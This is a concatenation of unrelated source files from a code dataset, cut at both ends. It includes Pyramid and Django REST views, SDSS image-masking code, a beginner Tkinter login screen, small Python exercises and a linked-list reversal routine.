= value\n return result_dict\n\n # return {key: value for key, value in self.__dict__.items()\n # # Do not serialize 'private' attributes\n # # (SQLAlchemy-internal attributes are among those, too)\n # if not key.startswith('_')\n # and key not in json_exclude}\n\n\nBase2 = automap_base(cls=Base)\n\n# from pyramid.httpexceptions import (\n# HTTPFound,\n# HTTPNotFound,\n# )\n\nfrom pyramid.view import view_config\n\n# from .models import (\n# DBSession,\n# )\n#\n\n# @view_config(route_name='view_wiki')\n# def view_wiki(request):\n# return HTTPFound(location=request.route_url('view_page',\n# pagename='FrontPage'))\n\n\n@view_config(route_name='view_page', renderer='json')\ndef view_page(request):\n # engine, suppose it has two tables 'user' and 'address' set up\n engine = create_engine(\"postgresql+psycopg2://manu:'manu'@/postgres\")\n\n # reflect the tables\n Base2.prepare(engine, reflect=True)\n\n # mapped classes are now created with names by default\n # matching that of the table name.\n CSVHandle = Base2.classes.CSVHandle\n # config = Configurator()\n # json_renderer = JSON()\n # def CSVHandle_adapter(obj, request):\n # return obj.isoformat()\n # json_renderer.add_adapter(CSVHandle, CSVHandle_adapter)\n # config.add_renderer('json', json_renderer)\n\n session = Session(engine)\n # cols = []\n # col_list = CSVHandle.__table__.columns\n # for co in col_list:\n # cols.append(co.key)\n\n rows = session.query(CSVHandle).order_by(CSVHandle.id).all()\n # if rows is None:\n # return HTTPNotFound('No such page')\n # print \"type o f cs fdb \"\n # print rows\n\n results = []\n # getting columns names from the DB\n\n\n # for row in rows:\n # results.append(jsonpickle.encode(row))\n # results = \"%s %s %s %s %s \" % (results, row.field0,row.field1,row.field2,row.field3)\n # results = \" %s
\" % results\n log.debug('Returning rows in json format')\n return rows\n\n\n@view_config(route_name='view_page_template', renderer='templates/view.pt')\ndef view_page_template(request):\n return {}","sub_path":"tutorial/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"203440176","text":"from django.conf.urls.defaults import patterns, include, url\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom djangorestframework.views import ListOrCreateModelView, InstanceModelView\nfrom restapi.resources import *\n\nfrom views import ListOrCreateUserView\n\nhandler500 = 'mainsite.views.error500'\nhandler404 = 'mainsite.views.error404'\n\n\nurlpatterns = patterns('',\n\n url(r'^player/$', ListOrCreateModelView.as_view(resource=PlayerResource), name='player_list'),\n url(r'^player/(?P[0-9]+)/$', InstanceModelView.as_view(resource=PlayerResource)),\n\n url(r'^user/$', ListOrCreateUserView.as_view(), name='user_list'),\n url(r'^user/(?P[0-9]+)/$', InstanceModelView.as_view(resource=UserResource), name='user_detail'),\n\n url(r'^pieceColor/$', ListOrCreateModelView.as_view(resource=PieceColorResource), name='pieceColor_list'),\n url(r'^pieceColor/(?P[0-9]+)/$', InstanceModelView.as_view(resource=PieceColorResource), name='pieceColor_detail'),\n\n url(r'^boardSetup/$', ListOrCreateModelView.as_view(resource=BoardSetupResource), name='boardSetup_list'),\n url(r'^boardSetup/(?P[0-9]+)/$', InstanceModelView.as_view(resource=BoardSetupResource), name='boardSetup_detail'),\n\n url(r'^boardSetupColor/$', ListOrCreateModelView.as_view(resource=BoardSetupColorResource), name='boardSetupColor_list'),\n url(r'^boardSetupColor/(?P[0-9]+)/$', InstanceModelView.as_view(resource=BoardSetupColorResource), name='boardSetupColor_detail'),\n\n url(r'^game/$', ListOrCreateModelView.as_view(resource=GameResource), name='game_list'),\n url(r'^game/(?P[0-9]+)/$', InstanceModelView.as_view(resource=GameResource), name='game_detail'),\n\n url(r'^gamePlayer/$', ListOrCreateModelView.as_view(resource=GamePlayerResource), name='gamePlayer_list'),\n url(r'^gamePlayer/(?P[0-9]+)/$', InstanceModelView.as_view(resource=GamePlayerResource), name='gamePlayer_detail'),\n\n url(r'^gameAction/$', ListOrCreateModelView.as_view(resource=GameActionResource), name='gameAction_list'),\n url(r'^gameAction/(?P[0-9]+)/$', InstanceModelView.as_view(resource=GameActionResource), name='gameAction_detail'),\n)\n\nif getattr(settings, 'DEBUG', False) or getattr(settings, 'DEBUG_STATIC', False):\n # If we are in debug mode, prepend a rule to urlpatterns to serve the static media\n import re\n urlpatterns = patterns('',\n url(r'^%s(?P.*)$' % re.escape(settings.STATIC_URL), 'django.views.static.serve', {\n 'document_root': settings.STATIC_ROOT\n }),\n ) + urlpatterns\n","sub_path":"apps/restapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"118243683","text":"\n\nfrom xai.brain.wordbase.nouns._habitation import _HABITATION\n\n#calss header\nclass _HABITATIONS(_HABITATION, ):\n\tdef __init__(self,): \n\t\t_HABITATION.__init__(self)\n\t\tself.name = \"HABITATIONS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"habitation\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_habitations.py","file_name":"_habitations.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"281704731","text":"import matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport handy.scatter as hsc\n\nimport astropy.units as U\nimport astropy.constants as C\nfrom astropy import cosmology as apcy\n\nfrom dustmaps.sfd import SFDQuery\nfrom extinction_redden import A_wave\nfrom astropy.coordinates import SkyCoord\n\nimport h5py\nimport numpy as np\nimport pandas as pds\nimport astropy.wcs as awc\nimport subprocess as subpro\nimport astropy.io.ascii as asc\nimport astropy.io.fits as fits\n\nfrom mpi4py import MPI\ncommd = MPI.COMM_WORLD\nrank = commd.Get_rank()\ncpus = commd.Get_size()\nimport time\n##\nkpc2cm = U.kpc.to(U.cm)\nMpc2pc = U.Mpc.to(U.pc)\nMpc2cm = U.Mpc.to(U.cm)\nrad2asec = U.rad.to(U.arcsec)\npc2cm = U.pc.to(U.cm)\nLsun = C.L_sun.value*10**7\n# cosmology model\nTest_model = apcy.Planck15.clone(H0 = 67.74, Om0 = 0.311)\nH0 = Test_model.H0.value\nh = H0/100\nOmega_m = Test_model.Om0\nOmega_lambda = 1.-Omega_m\nOmega_k = 1.- (Omega_lambda + Omega_m)\n\npixel = 0.396 # the pixel size in unit arcsec\nz_ref = 0.250 \nDa_ref = Test_model.angular_diameter_distance(z_ref).value\nJy = 10**(-23) # (erg/s)/cm^2\nf0 = 3631*10**(-23) # zero point in unit (erg/s)/cm^-2\n\n# sample catalog\nwith h5py.File('/mnt/ddnfs/data_users/cxkttwl/ICL/data/mpi_h5/sample_catalog.h5', 'r') as f:\n\tcatalogue = np.array(f['a'])\nz = catalogue[0]\nra = catalogue[1]\ndec = catalogue[2]\nd_file = '/mnt/ddnfs/data_users/cxkttwl/ICL/wget_data/'\n#d_file = '/mnt/ddnfs/data_users/cxkttwl/ICL/data/sky_sub_img/' # add sky information\n\nload = '/mnt/ddnfs/data_users/cxkttwl/ICL/data/'\nband = ['r', 'g', 'i', 'u', 'z']\nl_wave = np.array([6166, 4686, 7480, 3551, 8932])\nmag_add = np.array([0, 0, 0, -0.04, 0.02])\nzopt = np.array([22.5, 22.5, 22.5, 22.46, 22.52])\nsb_lim = np.array([24.5, 25, 24, 24.35, 22.9])\nRv = 3.1\nsfd = SFDQuery()\n\ndef mask_A(band_id, z_set, ra_set, dec_set):\n\n\tkk = np.int(band_id)\n\tNz = len(z_set)\n\tparam_A = 'default_mask_A.sex'\n\tout_cat = 'default_mask_A.param'\n\tout_load_A = '/mnt/ddnfs/data_users/cxkttwl/PC/A_mask_%d_cpus.cat' % rank\n\t## size test\n\tr_res = 1. # 2.8 for larger R setting\n\tfor q in range(Nz):\n\t\tz_g = z_set[q]\n\t\tra_g = ra_set[q]\n\t\tdec_g = dec_set[q]\n\n\t\tprint('Now band is', band[kk])\n\t\tprint('*' * 20)\n\t\tpro_f = d_file + 'frame-%s-ra%.3f-dec%.3f-redshift%.3f.fits.bz2' % (band[kk], ra_g, dec_g, z_g)\n\n\t\tdata_f = fits.open(pro_f)\n\t\timg = data_f[0].data\n\t\thead_inf = data_f[0].header\n\t\twcs = awc.WCS(head_inf)\n\t\tcx_BCG, cy_BCG = wcs.all_world2pix(ra_g*U.deg, dec_g*U.deg, 1)\n\t\tR_ph = rad2asec / (Test_model.angular_diameter_distance(z_g).value)\n\t\tR_p = R_ph / pixel\n\n\t\tx0 = np.linspace(0, img.shape[1] - 1, img.shape[1])\n\t\ty0 = np.linspace(0, img.shape[0] - 1, img.shape[0])\n\t\timg_grid = np.array(np.meshgrid(x0, y0))\n\t\tra_img, dec_img = wcs.all_pix2world(img_grid[0,:], img_grid[1,:], 1)\n\t\tpos = SkyCoord(ra_img, dec_img, frame = 'fk5', unit = 'deg')\n\t\tBEV = sfd(pos)\n\t\tAv = Rv * BEV * 0.86\n\t\tAl = A_wave(l_wave[kk], Rv) * Av\n\t\timg = img * 10 ** (Al / 2.5)\n\n\t\thdu = fits.PrimaryHDU()\n\t\thdu.data = img\n\t\thdu.header = head_inf\n\t\thdu.writeto('/mnt/ddnfs/data_users/cxkttwl/PC/source_data_%d.fits' % rank, overwrite = True)\n\n\t\tfile_source = '/mnt/ddnfs/data_users/cxkttwl/PC/source_data_%d.fits' % rank\n\t\tcmd = 'sex '+ file_source + ' -c %s -CATALOG_NAME %s -PARAMETERS_NAME %s'%(param_A, out_load_A, out_cat)\n\t\ta = subpro.Popen(cmd, shell = True)\n\t\ta.wait()\n\n\t\tsource = asc.read(out_load_A)\n\t\tNumb = np.array(source['NUMBER'][-1])\n\t\tA = np.array(source['A_IMAGE'])\n\t\tB = np.array(source['B_IMAGE'])\n\t\ttheta = np.array(source['THETA_IMAGE'])\n\t\tcx = np.array(source['X_IMAGE']) - 1\n\t\tcy = np.array(source['Y_IMAGE']) - 1\n\t\tp_type = np.array(source['CLASS_STAR'])\n\n\t\tKron = 6 * r_res # iso_radius set as 3 times rms (2.8 from size test)\n\t\ta = Kron * A\n\t\tb = Kron * B\n\n\t\tmask = load + 'bright_star_dr12/source_SQL_Z%.3f_ra%.3f_dec%.3f.txt'%(z_g, ra_g, dec_g)\n\t\tcat = pds.read_csv(mask, skiprows = 1)\n\t\tset_ra = np.array(cat['ra'])\n\t\tset_dec = np.array(cat['dec'])\n\t\tset_mag = np.array(cat['r'])\n\t\tOBJ = np.array(cat['type'])\n\t\txt = cat['Column1']\n\t\ttau = 10 * r_res # the mask size set as 10 * FWHM from dr12\n\n\t\tset_A = np.array( [ cat['psffwhm_r'] , cat['psffwhm_g'], cat['psffwhm_i']]) * tau / pixel\n\t\tset_B = np.array( [ cat['psffwhm_r'] , cat['psffwhm_g'], cat['psffwhm_i']]) * tau / pixel\n\t\tset_chi = np.zeros(set_A.shape[1], dtype = np.float)\n\n\t\tlln = np.array([len(set_A[:,ll][set_A[:,ll] > 0 ]) for ll in range(set_A.shape[1]) ])\n\t\tlr_iso = np.array([np.max(set_A[:,ll]) for ll in range(set_A.shape[1]) ])\n\t\tsr_iso = np.array([np.max(set_B[:,ll]) for ll in range(set_B.shape[1]) ])\n\t\t# bright stars\n\t\tx, y = wcs.all_world2pix(set_ra * U.deg, set_dec * U.deg, 1)\n\t\tia = (x >= 0) & (x <= img.shape[1])\n\t\tib = (y >= 0) & (y <= img.shape[0])\n\t\tie = (set_mag <= 20)\n\t\tiq = lln >= 2\n\t\tig = OBJ == 6\n\t\tic = (ia & ib & ie & ig & iq)\n\t\tsub_x0 = x[ic]\n\t\tsub_y0 = y[ic]\n\t\tsub_A0 = lr_iso[ic]\n\t\tsub_B0 = sr_iso[ic]\n\t\tsub_chi0 = set_chi[ic]\n\n\t\t# saturated source(may not stars)\n\t\txa = ['SATURATED' in qq for qq in xt]\n\t\txv = np.array(xa)\n\t\tidx = xv == True\n\t\tipx = (idx & ia & ib)\n\n\t\tsub_x2 = x[ipx]\n\t\tsub_y2 = y[ipx]\n\t\tsub_A2 = 3 * lr_iso[ipx]\n\t\tsub_B2 = 3 * sr_iso[ipx]\n\t\tsub_chi2 = set_chi[ipx]\n\n\t\tcomx = np.r_[sub_x0[sub_A0 > 0], sub_x2[sub_A2 > 0]]\n\t\tcomy = np.r_[sub_y0[sub_A0 > 0], sub_y2[sub_A2 > 0]]\n\t\tLr = np.r_[sub_A0[sub_A0 > 0], sub_A2[sub_A2 > 0]]\n\t\tSr = np.r_[sub_B0[sub_A0 > 0], sub_B2[sub_A2 > 0]]\n\t\tphi = np.r_[sub_chi0[sub_A0 > 0], sub_chi2[sub_A2 > 0]]\n\n\t\tcx = np.r_[cx, comx]\n\t\tcy = np.r_[cy, comy]\n\t\ta = np.r_[a, Lr]\n\t\tb = np.r_[b, Sr]\n\t\ttheta = np.r_[theta, phi]\n\t\tNumb = Numb + len(comx)\n\n\t\tmask_A = np.ones((img.shape[0], img.shape[1]), dtype = np.float)\n\t\tox = np.linspace(0, img.shape[1] - 1, img.shape[1])\n\t\toy = np.linspace(0, img.shape[0] - 1, img.shape[0])\n\t\tbasic_coord = np.array(np.meshgrid(ox, oy))\n\t\tmajor = a / 2\n\t\tminor = b / 2 # set the star mask based on the major and minor radius\n\t\tsenior = np.sqrt(major**2 - minor**2)\n\n\t\ttdr = np.sqrt((cx - cx_BCG)**2 + (cy - cy_BCG)**2)\n\t\tdr00 = np.where(tdr == np.min(tdr))[0]\n\n\t\tfor k in range(Numb):\n\t\t\txc = cx[k]\n\t\t\tyc = cy[k]\n\n\t\t\tlr = major[k]\n\t\t\tsr = minor[k]\n\t\t\tcr = senior[k]\n\t\t\tchi = theta[k]*np.pi/180\n\n\t\t\tset_r = np.int(np.ceil(1.2 * lr))\n\t\t\tla0 = np.max( [np.int(xc - set_r), 0])\n\t\t\tla1 = np.min( [np.int(xc + set_r +1), img.shape[1] - 1] )\n\t\t\tlb0 = np.max( [np.int(yc - set_r), 0] ) \n\t\t\tlb1 = np.min( [np.int(yc + set_r +1), img.shape[0] - 1] )\n\n\t\t\tif k == dr00[0] :\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tdf1 = (basic_coord[0,:][lb0: lb1, la0: la1] - xc)* np.cos(chi) + (basic_coord[1,:][lb0: lb1, la0: la1] - yc)* np.sin(chi)\n\t\t\t\tdf2 = (basic_coord[1,:][lb0: lb1, la0: la1] - yc)* np.cos(chi) - (basic_coord[0,:][lb0: lb1, la0: la1] - xc)* np.sin(chi)\n\t\t\t\tfr = df1**2 / lr**2 + df2**2 / sr**2\n\t\t\t\tjx = fr <= 1\n\n\t\t\t\tiu = np.where(jx == True)\n\t\t\t\tiv = np.ones((jx.shape[0], jx.shape[1]), dtype = np.float)\n\t\t\t\tiv[iu] = np.nan\n\t\t\t\tmask_A[lb0: lb1, la0: la1] = mask_A[lb0: lb1, la0: la1] * iv\n\n\t\tmirro_A = mask_A * img\n\n\t\thdu = fits.PrimaryHDU()\n\t\thdu.data = mirro_A\n\t\thdu.header = head_inf\n\t\thdu.writeto(load + 'mask_data/A_plane/1.5sigma/A_mask_data_%s_ra%.3f_dec%.3f_z%.3f.fits'%(band[kk], ra_g, dec_g, z_g),overwrite = True)\n\t\t'''\n\t\tplt.figure()\n\t\tax = plt.imshow(mirro_A, cmap = 'Greys', origin = 'lower', vmin = 1e-3, norm = mpl.colors.LogNorm())\n\t\tplt.colorbar(ax, fraction = 0.035, pad = 0.01, label = '$flux[nmaggy]$')\n\n\t\thsc.circles(cx_BCG, cy_BCG, s = R_p, fc = '', ec = 'b', )\n\t\thsc.circles(cx_BCG, cy_BCG, s = 1.1 * R_p, fc = '', ec = 'b', ls = '--')\n\t\tplt.scatter(cx_BCG, cy_BCG, s = 10, marker = 'X', facecolors = '', edgecolors = 'r', linewidth = 0.5, alpha = 0.5)\n\t\tplt.title('A mask img ra%.3f dec%.3f z%.3f in %s band' % (ra_g, dec_g, z_g, band[kk] ) )\n\t\tplt.xlim(0, mirro_A.shape[1])\n\t\tplt.ylim(0, mirro_A.shape[0])\n\t\tplt.savefig(\n\t\t\t'/mnt/ddnfs/data_users/cxkttwl/ICL/fig_class/A_mask/A_mask_%s_ra%.3f_dec%.3f_z%.3f.png'%(band[kk], ra_g, dec_g, z_g), dpi = 300)\n\t\tplt.close()\n\t\t'''\n\treturn\n\ndef main():\n\tt0 = time.time()\n\tNtot = len(z)\n\tcommd.Barrier()\n\tfor tt in range(len(band)):\n\t\tm, n = divmod(Ntot, cpus)\n\t\tN_sub0, N_sub1 = m * rank, (rank + 1) * m\n\t\tif rank == cpus - 1:\n\t\t\tN_sub1 += n\n\t\tmask_A(tt, z[N_sub0 :N_sub1], ra[N_sub0 :N_sub1], dec[N_sub0 :N_sub1])\n\tcommd.Barrier()\n\tt1 = time.time() - t0\n\tprint('t = ', t1)\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"code_SDSS/ICL_mask_1.5sigma.py","file_name":"ICL_mask_1.5sigma.py","file_ext":"py","file_size_in_byte":8336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"532684271","text":"from tkinter import*\nm= Tk()\nn=Tk()\n\ndef homepg():\n\tl1= Label(m, text=\"WELCOME TO _______ \").grid(row=1, column=1)\n\tb1= Button(m, text=\"Login\", command= login).grid(row=2,column=1)\n\tb2= Button(m, text=\"Signup\", command= signup).grid(row=3,column=1)\n\ndef login():\n def gsearch(x):\n f1 = open(\"file.txt\", \"r\")\n if x in f1:\n print(\"found\")\n f1.close()\n l2= Label(m,text=\"Enter your name: \").grid(row=5, column=1)\n e1= Entry(m)\n e1.grid(row=5,column=2) \n ef1= e1.get()\n b3= Button(m, text=\"Submit\", command= gsearch(ef1) ).grid(row=5,column=3) \n l3= Label(m,text=\"Enter your password: \").grid(row=6, column=1)\n e2= Entry(m,show=\"*\")\n e2.grid(row=6,column=2)\n ef2= e2.get()\n b4= Button(m, text=\"Submit\", command= gsearch(ef2)).grid(row=6,column=3)\n l4= Label(m,text=\"WELCOME BACK\").grid(row=9, column=1)\n b5= Button(m, text=\"Continue\", command= mainmenu).grid(row=10,column=1) \n\ndef signup():\n def ginput(x):\n f1 = open(\"file.txt\", \"w\") \n f1.write(x) \n f1.close() \n l2= Label(m,text=\"Enter your name: \").grid(row=5, column=1)\n e1= Entry(m)\n e1.grid(row=5,column=2)\n ef1= e1.get()\n b3= Button(m, text=\"Submit\", command= ginput(ef1)).grid(row=5,column=3) \n l3= Label(m,text=\"Enter your password: \").grid(row=6, column=1)\n e2= Entry(m,show=\"*\")\n e2.grid(row=6,column=2)\n ef2= e2.get()\n b4= Button(m, text=\"Submit\", command= ginput(ef2)).grid(row=6,column=3) \n l4= Label(m,text=\"WELCOME\").grid(row=9, column=1)\n b5= Button(m, text=\"Continue\", command= mainmenu).grid(row=10,column=1)\n \ndef mainmenu():\n l1= Label(n,text=\"CHOOSE: \").grid(row=1, column=1)\n b1= Button(n, text=\"BMI\", command= bmi).grid(row=3,column=1)\n b2= Button(n, text=\"Pulse/ Heart Rate\", command= phrate).grid(row=5,column=1)\n b3= Button(n, text=\"Calories burnt - Exercise\", command= exercise).grid(row=7,column=1)\n b4= Button(n, text=\"Calories consumed - Food\", command= food).grid(row=9,column=1)\n \nhomepg()\n\t\nm.mainloop()\n","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"75820812","text":"# zamiast takiej linijki:\n# a = float(input(\"Wprowadź wysokość [cm]: \"))\n# mogą być dwie takie:\na = input(\"Wprowadź wysokość [cm]: \")\na = float(a)\n\nb = float(input(\"Wprowadź szerokość [cm]: \"))\nc = float(input(\"Wprowadź głębokość [cm]: \"))\n\nobjetosc = a * b * c\n\nprint(f\"Objętość to {objetosc} cm³. Czy to więcej niż litr? {objetosc > 1000}\")\n\nnadmiar = 0\nif objetosc > 1000:\n print(\"Niestety za dużo\")\n nadmiar = objetosc - 1000\n print(\"Za dużo o\", nadmiar)\n\nprint(\"Nadmiar był\", nadmiar)","sub_path":"basic/ex_08.py","file_name":"ex_08.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"436879333","text":"#Two words are anagrams if you can rearrange the letters from one to spell the other. Write a function\n# called is_anagram that takes two strings and returns True if they are anagrams.\ndef is_anagram(str1,str2):\n str1=list(sorted(str1))\n str2=list(sorted(str2))\n if str1==str2:\n return True\n else:\n return False\nstr1=str(input('Enter string1:'))\nstr2=str(input('Enter string2:'))\nprint(is_anagram(str1,str2))","sub_path":"problemset3/proset3_10.py","file_name":"proset3_10.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"166903033","text":"import pandas as pd\nimport numpy as np\n\ndef load(dataName):\n\n\n inputDim = 784\n normalNumber=80\n noise=5\n dataName='datasets/'+dataName\n train_P_df = pd.read_csv(dataName+'/'+'Train_P[%s].csv'%(normalNumber),sep=',')\n train_U_df = pd.read_csv(dataName+'/'+'Train_U[%s]_[%s].csv'%(normalNumber,noise),sep=',')\n \n test_df = pd.read_csv(dataName+'/'+'Test_set[%s].csv'%(normalNumber),sep=',') \n trainU = train_U_df[[ '%s'%(x) for x in range(inputDim)] ].values \n trainP = train_P_df[[ '%s'%(x) for x in range(inputDim)] ].values\n \n testX = test_df[[ '%s'%(x) for x in range(inputDim)] ].values\n testY= test_df['anomaly_label'].values\n\n N_list = train_U_df.loc[train_U_df['anomaly_label']==0].index\n A_list = train_U_df.loc[train_U_df['anomaly_label']==1].index\n \n if dataName =='multimnist':\n normalClass1 = int(normalNumber/10)\n normalClass2 = int(normalNumber%10)\n \n N_list1 = train_U_df.loc[train_U_df['type_label']==normalClass1].index\n N_list2 = train_U_df.loc[train_U_df['type_label']==normalClass2].index\n else: \n N_list1 = N_list\n N_list2 = []\n\n return trainP,trainU,N_list,N_list1,N_list2,A_list,testX,testY\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"603907886","text":"# -*- coding: utf-8 -*-\n\nfrom django.http import Http404\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework import fields, serializers\nfrom django.http import HttpResponse, JsonResponse\nfrom django.db import connection\nfrom rest_framework.decorators import api_view\nimport datetime\nfrom ...util.date_util import formataData\n\nfrom ..models import v_setor, v_pessoa, v_centro_custo, v_item, v_cmcfuncionarios\n\n\nclass SetorSerializer(serializers.ModelSerializer):\n class Meta:\n model = v_setor\n fields = ('set_id', 'set_nome', 'set_sigla', 'set_id_superior', 'set_ativo', 'set_tipo')\n\n\nclass PessoaSerializer(serializers.ModelSerializer):\n class Meta:\n model = v_pessoa\n fields = ('pes_matricula', 'pes_nome', 'set_id')\n\n\nclass CentroCustoSerializer(serializers.ModelSerializer):\n class Meta:\n model = v_centro_custo\n fields = ('centrocusto', 'local', 'descricao', 'ativoinativoai', 'codigoresponsavel')\n\n\nclass ItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = v_item\n fields = (\n 'item', 'unidade', 'classificacao', 'desc_classificacao', 'desc_item', 'estocavel', 'ativoinativoai', 'valor',\n 'ativo_classificacao', 'itememanalisesn')\n\n\nclass FuncionarioSerializer(serializers.ModelSerializer):\n class Meta:\n model = v_cmcfuncionarios\n fields = ('matricula', 'pessoa', 'pes_nome', 'funcao', 'set_id', 'ind_estagiario', 'cpf')\n\n\n@api_view(['GET'])\ndef setores(request):\n setores = v_setor.objects.filter(set_ativo=True).order_by('set_nome')\n serializer = SetorSerializer(setores, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef pessoas_setor(request, set_id):\n pessoas = v_pessoa.objects.filter(set_id=set_id)\n serializer = PessoaSerializer(pessoas, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef pessoa(request, pes_matricula):\n pessoa = v_pessoa.objects.get(pes_matricula=pes_matricula)\n serializer = PessoaSerializer(pessoa)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef pessoas(request):\n pessoas = v_pessoa.objects.all()\n serializer = PessoaSerializer(pessoas, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef setor(request, pes_matricula):\n try:\n pessoa = v_pessoa.objects.get(pes_matricula=pes_matricula)\n setor = v_setor.objects.get(set_id=pessoa.set_id)\n serializer = SetorSerializer(setor, many=False)\n return Response(serializer.data)\n except setor.DoesNotExist:\n raise Http404\n\n\n@api_view(['GET'])\ndef centros_custo(request):\n centros_custo = v_centro_custo.objects.filter(ativoinativoai='A').order_by('descricao')\n serializer = CentroCustoSerializer(centros_custo, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef centro_custo(request, centro_custo):\n try:\n centro_custo = v_centro_custo.objects.get(centrocusto=centro_custo)\n serializer = CentroCustoSerializer(centro_custo, many=False)\n return Response(serializer.data)\n except centro_custo.DoesNotExist:\n raise Http404\n\n\n@api_view(['GET'])\ndef itens(request):\n itens = v_item.objects.filter(ativoinativoai='A').order_by('desc_item')\n serializer = ItemSerializer(itens, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef item(request, item_id):\n try:\n item = v_item.objects.get(item=item_id)\n serializer = ItemSerializer(item, many=False)\n return Response(serializer.data)\n except item.DoesNotExist:\n raise Http404\n\n\n@api_view(['GET'])\ndef setor_setor(request, set_id):\n try:\n setor = v_setor.objects.get(set_id=set_id)\n serializer = SetorSerializer(setor, many=False)\n return Response(serializer.data)\n except setor.DoesNotExist:\n raise Http404\n\n\n@api_view(['GET'])\ndef funcionarios(request):\n funcionarios = v_cmcfuncionarios.objects.all().order_by('pes_nome')\n serializer = FuncionarioSerializer(funcionarios, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef funcionarios_setor(request, set_id):\n funcionarios = v_cmcfuncionarios.objects.filter(set_id=set_id).order_by('pes_nome')\n serializer = FuncionarioSerializer(funcionarios, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef funcionario(request, pessoa):\n try:\n func = v_cmcfuncionarios.objects.get(pessoa=pessoa)\n serializer = FuncionarioSerializer(func, many=False)\n return Response(serializer.data)\n except v_cmcfuncionarios.DoesNotExist:\n raise Http404\n\n\n@api_view(['GET'])\ndef funcionario_matricula(request, matricula):\n try:\n funcionario = v_cmcfuncionarios.objects.get(matricula=matricula)\n serializer = FuncionarioSerializer(funcionario, many=False)\n return Response(serializer.data)\n except funcionario.DoesNotExist:\n raise Http404\n\n\ndef recursive_setores_subordinados(array, set_id, full):\n setores = v_setor.objects.filter(set_ativo=True).filter(set_id_superior=set_id)\n if setores:\n for setor in setores:\n setor_json = {}\n fields = ('set_id', 'set_nome', 'set_sigla', 'set_id_superior', 'set_ativo', 'set_tipo')\n setor_json['set_id'] = setor.set_id\n setor_json['set_nome'] = setor.set_nome\n setor_json['set_sigla'] = setor.set_sigla\n setor_json['set_id_superior'] = setor.set_id_superior\n setor_json['set_ativo'] = setor.set_ativo\n setor_json['set_tipo'] = setor.set_tipo\n array.append(setor_json)\n if full == '1':\n recursive_setores_subordinados(array, setor.set_id, full)\n\n\n@api_view(['GET'])\ndef setores_subordinados(request, set_id, full):\n array_setores = []\n\n recursive_setores_subordinados(array_setores, set_id, full)\n\n return JsonResponse(array_setores, safe=False)\n\n\n@api_view(['GET'])\ndef funcionarios_setor_func(request, set_id):\n func_json = []\n\n c = connection.cursor()\n c.callproc(\"fn_remoto_funcionarios\", [set_id, ])\n funcionarios = c.fetchall()\n c.close() \n for f in funcionarios:\n e_json = {}\n e_json['pessoa'] = f[0]\n e_json['matricula'] = f[1]\n e_json['pes_nome'] = f[2]\n e_json['funcao'] = f[3]\n e_json['set_id'] = f[4]\n e_json['ind_estagiario'] = f[5]\n func_json.append(e_json)\n return JsonResponse(func_json, safe=False)","sub_path":"mscmcldap/api/views/elotech.py","file_name":"elotech.py","file_ext":"py","file_size_in_byte":6552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"527034563","text":"def reverseBetween(self, head: ListNode, left: int, right: int) -> ListNode:\n def reverse_linked_list(head: ListNode):\n # 也可以使用递归反转一个链表\n pre = None\n cur = head\n while cur:\n next = cur.next\n cur.next = pre\n pre = cur\n cur = next\n\n # 因为头节点有可能发生变化,使用虚拟头节点可以避免复杂的分类讨论\n dummy_node = ListNode(-1,head)\n pre = dummy_node\n # 第 1 步:从虚拟头节点走 left - 1 步,来到 left 节点的前一个节点\n # 建议写在 for 循环里,语义清晰\n for _ in range(left - 1):\n pre = pre.next\n\n # 第 2 步:从 pre 再走 right - left + 1 步,来到 right 节点\n right_node = pre\n for _ in range(right - left + 1):\n right_node = right_node.next\n \n # 第 3 步:切断出一个子链表(截取链表)\n left_node = pre.next\n curr = right_node.next\n # 注意:切断链接\n pre.next = None\n right_node.next = None\n\n # 第 4 步:同第 206 题,反转链表的子区间\n reverse_linked_list(left_node)\n # 第 5 步:接回到原来的链表中\n pre.next = right_node\n left_node.next = curr\n return dummy_node.next","sub_path":"0092 Reverse Linked List II.py","file_name":"0092 Reverse Linked List II.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"505609405","text":"import sys\nimport argparse\nimport numpy as np\nimport verif.input\nimport netCDF4\nimport copy\nimport astropy.convolution\nimport scipy\nimport scipy.signal\n\n\n\"\"\" Convolves the 